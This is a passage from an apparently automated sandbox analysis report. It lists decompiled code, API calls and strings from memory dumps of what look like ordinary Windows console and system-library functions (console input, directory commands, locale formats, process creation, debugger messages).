					_t147 = 0x20;
					_t196 =  *0x11fd0d8 - _t147; // 0x20
					if(_t196 >= 0) {
						goto L66;
					} else {
						_t197 =  *0x11fd0d4 - _t147; // 0x20
						if(_t197 >= 0 || GetConsoleScreenBufferInfo(_t85,  &_v32) == 0) {
							goto L66;
						} else {
							_t149 =  *0x11fd0d8; // 0x20
							_t190 = _v32.dwCursorPosition;
							_t142 = 0;
							_t173 = 1 << _t149;
							asm("bts edx, eax");
							_v68 = _t190;
							_v56.wAttributes = 0x10;
							_v56.dwSize = 0;
							_v44 = 0;
							_v40 = 1;
							_v36 = 0;
							E011FB4DD( *0x11fd0d4 & 0x0000ffff);
							 *0x11fd580 = 0;
							 *0x11fd578 = 0;
							 *0x11fd574 = 0;
							 *0x11fd57c = 0;
							while(1) {
								L7:
								__imp__AcquireSRWLockShared(0x1217f20);
								_t93 = ReadConsoleW(_v56.dwSize, _t184, _a4, _v84,  &(_v56.dwCursorPosition));
								_v92 = _t93;
								__imp__ReleaseSRWLockShared(0x1217f20);
								_v68 =  *_v88;
								if( *0x11fd544 == 0) {
									_t95 = 0;
									__eflags = 0;
								} else {
									EnterCriticalSection( *0x1203858);
									 *0x11fd544 = 0;
									LeaveCriticalSection( *0x1203858);
									if(_t142 != 0) {
										RtlFreeHeap(GetProcessHeap(), 0, _t142);
									}
									_t95 = 0;
									_t142 = 0;
								}
								if(_v96 == 0) {
									break;
								}
								_t173 = _t173 | 0xffffffff;
								_v92 = _v92 | 0xffffffff;
								_v80 = _t95;
								if( *_v88 <= 0) {
									break;
								} else {
									while(1) {
										_t152 =  *(_t184 + _t95 * 2) & 0x0000ffff;
										if(_t152 == 0xd) {
											break;
										}
										_t206 = _t152 -  *0x11fd0d8; // 0x20
										if(_t206 == 0) {
											_v92 = _t95;
											goto L25;
										} else {
											_t207 = _t152 -  *0x11fd0d4; // 0x20
											if(_t207 == 0) {
												_v92 = _t95;
												_v80 = 1;
												L24:
												__eflags = _t173 - 0xffffffff;
												if(_t173 != 0xffffffff) {
													goto L18;
												} else {
													L25:
													__eflags = _t95 - 0xffffffff;
													if(_t95 == 0xffffffff) {
														goto L18;
													} else {
														 *_v88 = _t95;
														 *(_t184 + _t95 * 2) = 0;
														__eflags = _t142;
														if(_t142 == 0) {
															L35:
															_v96 = 1;
														} else {
															_t169 = _t142;
															_t133 = _t184;
															while(1) {
																_t181 =  *_t133;
																__eflags = _t181 -  *_t169;
																if(_t181 !=  *_t169) {
																	break;
																}
																__eflags = _t181;
																if(_t181 == 0) {
																	L32:
																	_t170 = 0;
																	_t134 = 0;
																} else {
																	_t182 =  *((intOrPtr*)(_t133 + 2));
																	__eflags = _t182 -  *((intOrPtr*)(_t169 + 2));
																	if(_t182 !=  *((intOrPtr*)(_t169 + 2))) {
																		break;
																	} else {
																		_t133 = _t133 + 4;
																		_t169 = _t169 + 4;
																		__eflags = _t182;
																		if(_t182 != 0) {
																			continue;
																		} else {
																			goto L32;
																		}
																	}
																}
																L34:
																_v96 = _t170;
																__eflags = _t134;
																if(_t134 != 0) {
																	goto L35;
																}
																goto L36;
															}
															asm("sbb eax, eax");
															_t134 = _t133 | 0x00000001;
															_t170 = 0;
															__eflags = 0;
															goto L34;
														}
														L36:
														_t99 = _v80;
														__eflags = _t99;
														if(__eflags == 0) {
															__eflags = _v92 - 2;
															if(__eflags > 0) {
																__imp___wcsnicmp(_t184, L"cd ", 3);
																_t193 = _t193 + 0xc;
																__eflags = _t99;
																if(__eflags == 0) {
																	L45:
																	_t99 = 1;
																} else {
																	__imp___wcsnicmp(_t184, L"rd ", 3);
																	_t193 = _t193 + 0xc;
																	__eflags = _t99;
																	if(__eflags == 0) {
																		goto L45;
																	} else {
																		__imp___wcsnicmp(_t184, L"md ", 3);
																		_t193 = _t193 + 0xc;
																		__eflags = _t99;
																		if(__eflags == 0) {
																			goto L45;
																		} else {
																			__imp___wcsnicmp(_t184, L"chdir ", 6);
																			_t193 = _t193 + 0xc;
																			__eflags = _t99;
																			if(__eflags == 0) {
																				goto L45;
																			} else {
																				__imp___wcsnicmp(_t184, L"rmdir ", 6);
																				_t193 = _t193 + 0xc;
																				__eflags = _t99;
																				if(__eflags == 0) {
																					goto L45;
																				} else {
																					__imp___wcsnicmp(_t184, L"mkdir ", 6);
																					_t193 = _t193 + 0xc;
																					__eflags = _t99;
																					if(__eflags == 0) {
																						goto L45;
																					} else {
																						__imp___wcsnicmp(_t184, L"pushd ", 6);
																						_t193 = _t193 + 0xc;
																						__eflags = _t99;
																						if(__eflags != 0) {
																							_t99 = _v80;
																						} else {
																							goto L45;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
														_push(_v96);
														_t155 = _t184;
														_push(_t99);
														_push( !(_v44 >> 4) & 0x00000001);
														_push(_v92);
														_t104 = E011FB2BF(_t142, _t184, _a4, _t184, _t190, __eflags);
														__eflags = _t104;
														if(_t104 == 0) {
															_t105 = E011E7797(_t155);
															__eflags = _t105;
															if(_t105 != 0) {
																 *0x121c014(0xffffffff);
															}
															_t156 = _t184;
															_t73 = _t156 + 2; // 0xc
															_t177 = _t73;
															do {
																_t106 =  *_t156;
																_t156 = _t156 + 2;
																__eflags = _t106 - _v80;
															} while (_t106 != _v80);
															_t157 = _t156 - _t177;
															__eflags = _t157;
															_v68 = _t157 >> 1;
														} else {
															E011F9897();
															_t118 = GetConsoleScreenBufferInfo(_v100,  &_v56);
															__eflags = _t118;
															if(_t118 != 0) {
																_t168 = _v50 - (_v92 + _v108) / _v56;
																__eflags = _t168;
																_v90 = _t168;
																_t190 = _v92;
															}
															_t163 = _t184;
															_t61 = _t163 + 2; // 0xc
															_t178 = _t61;
															do {
																_t119 =  *_t163;
																_t163 = _t163 + 2;
																__eflags = _t119 - _v80;
															} while (_t119 != _v80);
															_v88 = _t163 - _t178 >> 1;
															SetConsoleCursorPosition(_v100, _t190);
															_push( &_v84);
															_push(_t190);
															_push(_v84);
															_push(0x20);
															_push(_v100);
															FillConsoleOutputCharacterW();
															WriteConsoleW(_v120, _t184, _v108,  &_v108, 0);
															_v88 = _v108;
															E011E06C0(_t163 - _t178 >> 1);
														}
														__eflags = _t142;
														if(_t142 == 0) {
															_t143 = 0;
															__eflags = 0;
														} else {
															_t143 = 0;
															RtlFreeHeap(GetProcessHeap(), 0, _t142);
														}
														_t159 = _t184;
														_t76 = _t159 + 2; // 0xc
														_t173 = _t76;
														do {
															_t107 =  *_t159;
															_t159 = _t159 + 2;
															__eflags = _t107 - _t143;
														} while (_t107 != _t143);
														_t77 = (_t159 - _t173 >> 1) + 1; // 0x9
														_t108 = _t77;
														_v112 = _t108;
														_t142 = HeapAlloc(GetProcessHeap(), _t143, _t108 + _t108);
														__eflags = _t142;
														if(_t142 == 0) {
															_t87 = 0;
														} else {
															_t173 = _v112;
															E011E1040(_t142, _t173, _t184);
															goto L7;
														}
													}
												}
											} else {
												_t95 = _t95 + 1;
												if(_t95 <  *_v88) {
													continue;
												} else {
													goto L18;
												}
											}
										}
										goto L67;
									}
									_t173 = _t95;
									_t95 = _v92;
									goto L24;
								}
								goto L67;
							}
							L18:
							if(_t142 != 0) {
								RtlFreeHeap(GetProcessHeap(), 0, _t142);
							}
							_t87 = _v96;
						}
					}
				}
				L67:
				_pop(_t185);
				_pop(_t189);
				_pop(_t141);
				return E011E6FD0(_t87, _t141, _v16 ^ _t193, _t173, _t185, _t189);
			}







































































                                    0x011f3506
                                    0x011f350e
                                    0x011f3511
                                    0x011f3518
                                    0x011f351e
                                    0x011f3524
                                    0x011f3526
                                    0x011f352a
                                    0x011f352e
                                    0x011f3534
                                    0x011f353b
                                    0x011f353f
                                    0x011f3546
                                    0x011f3546
                                    0x011f3551
                                    0x011f3932
                                    0x011f3938
                                    0x011f3949
                                    0x011f3952
                                    0x011f3958
                                    0x011f3557
                                    0x011f3559
                                    0x011f355a
                                    0x011f3561
                                    0x00000000
                                    0x011f3567
                                    0x011f3567
                                    0x011f356e
                                    0x00000000
                                    0x011f3588
                                    0x011f3588
                                    0x011f3598
                                    0x011f359c
                                    0x011f359e
                                    0x011f35a0
                                    0x011f35a3
                                    0x011f35a7
                                    0x011f35af
                                    0x011f35b3
                                    0x011f35b7
                                    0x011f35bb
                                    0x011f35bf
                                    0x011f35c4
                                    0x011f35ca
                                    0x011f35d0
                                    0x011f35d6
                                    0x011f35dc
                                    0x011f35dc
                                    0x011f35e1
                                    0x011f35f8
                                    0x011f3603
                                    0x011f3607
                                    0x011f361a
                                    0x011f361e
                                    0x011f365a
                                    0x011f365a
                                    0x011f3620
                                    0x011f3626
                                    0x011f3634
                                    0x011f3639
                                    0x011f3641
                                    0x011f364e
                                    0x011f364e
                                    0x011f3654
                                    0x011f3656
                                    0x011f3656
                                    0x011f3661
                                    0x00000000
                                    0x00000000
                                    0x011f3667
                                    0x011f366a
                                    0x011f366f
                                    0x011f3676
                                    0x00000000
                                    0x011f3678
                                    0x011f3678
                                    0x011f3678
                                    0x011f367f
                                    0x00000000
                                    0x00000000
                                    0x011f3681
                                    0x011f3688
                                    0x011f36c8
                                    0x00000000
                                    0x011f368a
                                    0x011f368a
                                    0x011f3691
                                    0x011f36ba
                                    0x011f36be
                                    0x011f36d4
                                    0x011f36d4
                                    0x011f36d7
                                    0x00000000
                                    0x011f36d9
                                    0x011f36d9
                                    0x011f36d9
                                    0x011f36dc
                                    0x00000000
                                    0x011f36de
                                    0x011f36e2
                                    0x011f36e6
                                    0x011f36ea
                                    0x011f36ec
                                    0x011f3729
                                    0x011f3729
                                    0x011f36ee
                                    0x011f36ee
                                    0x011f36f0
                                    0x011f36f2
                                    0x011f36f2
                                    0x011f36f5
                                    0x011f36f8
                                    0x00000000
                                    0x00000000
                                    0x011f36fa
                                    0x011f36fd
                                    0x011f3714
                                    0x011f3714
                                    0x011f3716
                                    0x011f36ff
                                    0x011f36ff
                                    0x011f3703
                                    0x011f3707
                                    0x00000000
                                    0x011f3709
                                    0x011f3709
                                    0x011f370c
                                    0x011f370f
                                    0x011f3712
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f3712
                                    0x011f3707
                                    0x011f3721
                                    0x011f3721
                                    0x011f3725
                                    0x011f3727
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f3727
                                    0x011f371a
                                    0x011f371c
                                    0x011f371f
                                    0x011f371f
                                    0x00000000
                                    0x011f371f
                                    0x011f3731
                                    0x011f3731
                                    0x011f3735
                                    0x011f3737
                                    0x011f373d
                                    0x011f3742
                                    0x011f3750
                                    0x011f3756
                                    0x011f3759
                                    0x011f375b
                                    0x011f37db
                                    0x011f37dd
                                    0x011f375d
                                    0x011f3765
                                    0x011f376b
                                    0x011f376e
                                    0x011f3770
                                    0x00000000
                                    0x011f3772
                                    0x011f377a
                                    0x011f3780
                                    0x011f3783
                                    0x011f3785
                                    0x00000000
                                    0x011f3787
                                    0x011f378f
                                    0x011f3795
                                    0x011f3798
                                    0x011f379a
                                    0x00000000
                                    0x011f379c
                                    0x011f37a4
                                    0x011f37aa
                                    0x011f37ad
                                    0x011f37af
                                    0x00000000
                                    0x011f37b1
                                    0x011f37b9
                                    0x011f37bf
                                    0x011f37c2
                                    0x011f37c4
                                    0x00000000
                                    0x011f37c6
                                    0x011f37ce
                                    0x011f37d4
                                    0x011f37d7
                                    0x011f37d9
                                    0x011f37e0
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f37d9
                                    0x011f37c4
                                    0x011f37af
                                    0x011f379a
                                    0x011f3785
                                    0x011f3770
                                    0x011f375b
                                    0x011f3742
                                    0x011f37e4
                                    0x011f37eb
                                    0x011f37ed
                                    0x011f37fa
                                    0x011f37fb
                                    0x011f37ff
                                    0x011f3804
                                    0x011f3806
                                    0x011f38a7
                                    0x011f38ac
                                    0x011f38ae
                                    0x011f38b2
                                    0x011f38b2
                                    0x011f38b8
                                    0x011f38ba
                                    0x011f38ba
                                    0x011f38bd
                                    0x011f38bd
                                    0x011f38c0
                                    0x011f38c3
                                    0x011f38c3
                                    0x011f38ca
                                    0x011f38ca
                                    0x011f38ce
                                    0x011f380c
                                    0x011f380c
                                    0x011f381a
                                    0x011f3820
                                    0x011f3822
                                    0x011f383b
                                    0x011f383b
                                    0x011f383d
                                    0x011f3842
                                    0x011f3842
                                    0x011f3846
                                    0x011f3848
                                    0x011f3848
                                    0x011f384b
                                    0x011f384b
                                    0x011f384e
                                    0x011f3851
                                    0x011f3851
                                    0x011f3861
                                    0x011f3865
                                    0x011f386f
                                    0x011f3870
                                    0x011f3871
                                    0x011f3875
                                    0x011f3877
                                    0x011f387b
                                    0x011f3892
                                    0x011f389c
                                    0x011f38a0
                                    0x011f38a0
                                    0x011f38d2
                                    0x011f38d4
                                    0x011f38e9
                                    0x011f38e9
                                    0x011f38d6
                                    0x011f38d7
                                    0x011f38e1
                                    0x011f38e1
                                    0x011f38eb
                                    0x011f38ed
                                    0x011f38ed
                                    0x011f38f0
                                    0x011f38f0
                                    0x011f38f3
                                    0x011f38f6
                                    0x011f38f6
                                    0x011f38ff
                                    0x011f38ff
                                    0x011f3902
                                    0x011f3917
                                    0x011f3919
                                    0x011f391b
                                    0x011f392e
                                    0x011f391d
                                    0x011f391d
                                    0x011f3924
                                    0x00000000
                                    0x011f3924
                                    0x011f391b
                                    0x011f36dc
                                    0x011f3693
                                    0x011f3697
                                    0x011f369a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f369a
                                    0x011f3691
                                    0x00000000
                                    0x011f3688
                                    0x011f36ce
                                    0x011f36d0
                                    0x00000000
                                    0x011f36d0
                                    0x00000000
                                    0x011f3676
                                    0x011f369c
                                    0x011f369e
                                    0x011f36ab
                                    0x011f36ab
                                    0x011f36b1
                                    0x011f36b1
                                    0x011f356e
                                    0x011f3561
                                    0x011f395a
                                    0x011f395e
                                    0x011f395f
                                    0x011f3960
                                    0x011f396b

                                    APIs
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,0000000A,00000000,00000001), ref: 011F352E
                                    • _get_osfhandle.MSVCRT ref: 011F353F
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 011F357A
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F35E1
                                    • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000010), ref: 011F35F8
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F3607
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F3626
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F3639
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 011F3647
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F364E
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 011F36A4
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F36AB
                                    • _wcsnicmp.MSVCRT ref: 011F3750
                                    • _wcsnicmp.MSVCRT ref: 011F3765
                                    • _wcsnicmp.MSVCRT ref: 011F377A
                                    • _wcsnicmp.MSVCRT ref: 011F378F
                                    • _wcsnicmp.MSVCRT ref: 011F37A4
                                    • _wcsnicmp.MSVCRT ref: 011F37B9
                                    • _wcsnicmp.MSVCRT ref: 011F37CE
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,00000001,?), ref: 011F381A
                                    • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 011F3865
                                    • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 011F387B
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000000), ref: 011F3892
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 011F38DA
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F38E1
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000009,?,?,?,00000001), ref: 011F390A
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011F3911
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F3938
                                    • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000000), ref: 011F3949
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F3952
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferCriticalInfoReadReleaseScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
                                    • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                    • API String ID: 2991647268-3100821235
                                    • Opcode ID: 2f843f7b86870d9b13edaa71d5c6646b396032770ff09ef04dea9e27c5d9d60b
                                    • Instruction ID: 45fd8c7e27964852de64885f15b11fef0f8a65f405dab691c5ca65f65186337c
                                    • Opcode Fuzzy Hash: 2f843f7b86870d9b13edaa71d5c6646b396032770ff09ef04dea9e27c5d9d60b
                                    • Instruction Fuzzy Hash: 53C1D671614301AFDB28DF68E89CA6B7BE5FF98714F04492DFA66C2294DB31C581CB12
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E3F80, Relevance: 47.6, APIs: 15, Strings: 12, Instructions: 395COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011E41A4: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(011D5BA1,0000001F,?,00000080), ref: 011E41A4
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001E,011FF81C,00000008,00000000,?), ref: 011E3FA8
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 011E3FC5
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 011E402A
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 011E406C
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,011FF80C,00000008), ref: 011E4094
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,011FF7A8,00000020), ref: 011E40AC
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,011FF768,00000020), ref: 011E40C4
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,011FF728,00000020), ref: 011E40DC
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,011FF6E8,00000020), ref: 011E40F4
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,011FF6A8,00000020), ref: 011E410C
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,011FF668,00000020), ref: 011E4124
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,011FF628,00000020), ref: 011E413C
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,011FF7FC,00000008), ref: 011E4154
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,011FF7E8,00000008), ref: 011E416C
                                    • setlocale.MSVCRT ref: 011E4181
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InfoLocale$DefaultUsersetlocale
                                    • String ID: .OCP$1$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                    • API String ID: 1351325837-478706884
                                    • Opcode ID: af09c8423edd66751bac084db4a9282ea27db8f0ec520b16768e2fe59d3c0293
                                    • Instruction ID: 01d5c50c34bf41494f6a64a8ceedfd0b5577f7e0b08e51f19e1b576177d46185
                                    • Opcode Fuzzy Hash: af09c8423edd66751bac084db4a9282ea27db8f0ec520b16768e2fe59d3c0293
                                    • Instruction Fuzzy Hash: 39D12675702A029AEB3D8EB8890C7763AE5FF51644F14822DE612DA5C8EBB0C646C356
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E374E, Relevance: 42.3, APIs: 15, Strings: 9, Instructions: 322threadprocessstringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,011FBDF8,00000108,011DC897,?,00000000,00000000,00000000), ref: 011E37A0
                                    • UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 011E37CF
                                    • memset.MSVCRT ref: 011E37E7
                                    • memset.MSVCRT ref: 011E3840
                                    • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 011E3853
                                      • Part of subcall function 011E3320: _wcsnicmp.MSVCRT ref: 011E33A4
                                    • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 011E38AE
                                    • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 011E38F8
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011E391A
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 011EDDE6
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 011EDE02
                                    • DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 011EDE1B
                                    • CreateProcessAsUserW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 011EDEAE
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011EDFCB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: AttributeProcThread$CloseCreateErrorHandleLastListProcessmemset$DeleteInfoInitializeStartupUpdateUser_wcsnicmplstrcmp
                                    • String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
                                    • API String ID: 1603632292-3461277227
                                    • Opcode ID: d0212f88b018fa2c7bbe61fd571eaffbaab7243a03d1f4fe3e08752a976e5537
                                    • Instruction ID: 7396ef928c09472166a9c33fab79b4b2353d4f7010d55a68d293c9705eedfb2b
                                    • Opcode Fuzzy Hash: d0212f88b018fa2c7bbe61fd571eaffbaab7243a03d1f4fe3e08752a976e5537
                                    • Instruction Fuzzy Hash: E9C19570A106159EDF3CDBE9AC4CBAA7AF9BB55704F004099E619D7244EB708984CF52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03B1B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                    Download Yara Rule
                                    Strings
                                    • The resource is owned exclusively by thread %p, xrefs: 03B1B374
                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 03B1B3D6
                                    • *** An Access Violation occurred in %ws:%s, xrefs: 03B1B48F
                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 03B1B323
                                    • *** enter .exr %p for the exception record, xrefs: 03B1B4F1
                                    • a NULL pointer, xrefs: 03B1B4E0
                                    • *** then kb to get the faulting stack, xrefs: 03B1B51C
                                    • *** Inpage error in %ws:%s, xrefs: 03B1B418
                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 03B1B53F
                                    • The instruction at %p tried to %s , xrefs: 03B1B4B6
                                    • This failed because of error %Ix., xrefs: 03B1B446
                                    • The instruction at %p referenced memory at %p., xrefs: 03B1B432
                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 03B1B2DC
                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 03B1B476
                                    • The critical section is owned by thread %p., xrefs: 03B1B3B9
                                    • <unknown>, xrefs: 03B1B27E, 03B1B2D1, 03B1B350, 03B1B399, 03B1B417, 03B1B48E
                                    • read from, xrefs: 03B1B4AD, 03B1B4B2
                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 03B1B2F3
                                    • Go determine why that thread has not released the critical section., xrefs: 03B1B3C5
                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 03B1B484
                                    • write to, xrefs: 03B1B4A6
                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 03B1B39B
                                    • The resource is owned shared by %d threads, xrefs: 03B1B37E
                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 03B1B314
                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 03B1B352
                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 03B1B38F
                                    • *** enter .cxr %p for the context, xrefs: 03B1B50D
                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 03B1B305
                                    • an invalid address, %p, xrefs: 03B1B4CF
                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 03B1B47D
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                    • API String ID: 0-108210295
                                    • Opcode ID: 622ac52f99a8f0c8df7d8655cdb98ea1a3e03bda6b270a5b77fecbb50e632895
                                    • Instruction ID: e5f673f2af8aaedd415902d3ad7168ff80d93e1e29af54adfff2a0feb18b692a
                                    • Opcode Fuzzy Hash: 622ac52f99a8f0c8df7d8655cdb98ea1a3e03bda6b270a5b77fecbb50e632895
                                    • Instruction Fuzzy Hash: 2F81F139A40200FFCB21EB499C49D6E3F26EF87B59F8440A6F9046F212D3759561DBB2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E6550, Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 535COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: [...]$ [..]$ [.]$...$:
                                    • API String ID: 0-1980097535
                                    • Opcode ID: 176c60cbcccae4737d6721d0a1cf677c4dfcf800aeadb6879143fea61ea850c4
                                    • Instruction ID: ea77946fa626a114de49e8e16eda3abfc1c29951bf69ad6101efbe4a57f21a6c
